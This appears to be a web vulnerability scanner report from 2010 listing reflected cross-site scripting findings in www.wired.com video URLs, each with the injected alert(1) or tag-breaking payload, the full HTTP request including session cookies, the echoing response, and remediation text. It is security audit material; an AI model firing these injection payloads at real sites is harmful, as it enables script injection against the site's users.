<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest9f235"><a>b8db29e0880"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eacf"-alert(1)-"d294990f37b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest7eacf"-alert(1)-"d294990f37b/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:27 GMT Date: Mon, 22 Nov 2010 00:42:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c957"-alert(1)-"58f021e9e0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166331c957"-alert(1)-"58f021e9e0d/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:36 GMT Date: Mon, 22 Nov 2010 00:42:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03ae"-alert(1)-"0b563d8314b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hoursf03ae"-alert(1)-"0b563d8314b/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:43 GMT Date: Mon, 22 Nov 2010 00:42:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b449"-alert(1)-"0bf58a7d3e0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/6509491080019b449"-alert(1)-"0bf58a7d3e0 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:47:49 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload b932e--><script>alert(1)</script>cd14f4422d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videob932e--><script>alert(1)</script>cd14f4422d2/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29467 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:00 GMT Date: Mon, 22 Nov 2010 00:36:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videob932e--><script>alert(1)</script>cd14f4422d2/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89964"><a>de99cc590e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video89964"><a>de99cc590e1/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:39:52 GMT Date: Mon, 22 Nov 2010 00:34:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video89964"><a>de99cc590e1 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86122"><a>8261dbdb8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos86122"><a>8261dbdb8fd/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:40:55 GMT Date: Mon, 22 Nov 2010 00:36:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos86122"><a>8261dbdb8fd c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a57"-alert(1)-"bc5972f94a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos38a57"-alert(1)-"bc5972f94a3/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:05 GMT Date: Mon, 22 Nov 2010 00:37:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d3"><a>da689d17cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/lateste93d3"><a>da689d17cc4/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:10 GMT Date: Mon, 22 Nov 2010 00:37:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_lateste93d3"><a>da689d17cc4"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40533"-alert(1)-"ada59dabe1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest40533"-alert(1)-"ada59dabe1a/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:42:37 GMT Date: Mon, 22 Nov 2010 00:38:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353eb"-alert(1)-"5378680b007 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633353eb"-alert(1)-"5378680b007/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:17 GMT Date: Mon, 22 Nov 2010 00:38:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b25d5"-alert(1)-"54d4edc213d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/disneys-cars-2-goes-internationalb25d5"-alert(1)-"54d4edc213d/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:29 GMT Date: Mon, 22 Nov 2010 00:38:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db679"-alert(1)-"571402115f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001db679"-alert(1)-"571402115f6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:43:15 GMT Date: Mon, 22 Nov 2010 00:38:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc300"><a>678c092b783 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videocc300"><a>678c092b783/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29436 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:33 GMT Date: Mon, 22 Nov 2010 00:35:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videocc300"><a>678c092b783 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 613d3--><script>alert(1)</script>43b9bab8598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video613d3--><script>alert(1)</script>43b9bab8598/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29475 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video613d3--><script>alert(1)</script>43b9bab8598/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a9b"><a>c4d804fa51f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos28a9b"><a>c4d804fa51f/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos28a9b"><a>c4d804fa51f c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81130"-alert(1)-"2f35c747696 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos81130"-alert(1)-"2f35c747696/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=284 Expires: Mon, 22 Nov 2010 00:42:21 GMT Date: Mon, 22 Nov 2010 00:37:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106789
